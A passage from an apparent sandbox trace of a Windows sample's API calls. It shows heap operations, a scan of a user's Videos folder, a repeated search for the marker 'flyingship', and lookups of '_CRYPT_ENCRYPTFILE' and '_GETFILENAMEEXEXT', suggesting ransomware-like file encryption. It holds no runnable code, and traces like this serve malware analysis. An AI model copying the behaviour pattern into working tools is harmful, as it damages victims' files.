Size=0x18) returned 0x90d420 [0194.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0194.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0194.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0194.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0194.722] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0194.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0194.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0194.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0194.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0194.722] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0194.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0194.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0194.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0194.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0194.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0194.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0194.723] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0194.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0194.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0194.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0194.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0194.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0194.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0194.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0194.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0194.723] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fb86e90, ftCreationTime.dwHighDateTime=0x1d5e79c, ftLastAccessTime.dwLowDateTime=0x9c8857a0, ftLastAccessTime.dwHighDateTime=0x1d5dfea, ftLastWriteTime.dwLowDateTime=0x9c8857a0, ftLastWriteTime.dwHighDateTime=0x1d5dfea, nFileSizeHigh=0x0, nFileSizeLow=0x22da, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="6rBGDlSa.avi", cAlternateFileName="")) returned 0x90add8 [0194.723] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0194.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0194.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0194.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0194.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0194.723] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0194.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0194.723] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0194.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0194.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0194.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0194.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0194.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0194.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0194.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0194.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0194.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0194.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0194.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0194.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0194.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0194.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0194.724] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0194.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0194.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0194.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0194.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0194.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0194.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0194.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0194.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0194.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0194.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0194.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0194.724] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0194.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0194.724] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.725] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zmJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mJBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JBM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BM6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="F0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ozYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zYZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YZo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zo\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NHX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HX538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="X538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="538Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="38Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.726] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ki1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rBGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BGDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0194.727] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GDlSa.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0194.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0194.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0194.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0194.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0194.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0194.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0194.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0194.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0194.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0194.727] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0194.727] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0194.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0194.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0194.727] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0194.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0194.727] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0194.727] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0194.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0194.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0194.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0194.728] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0194.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0194.728] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 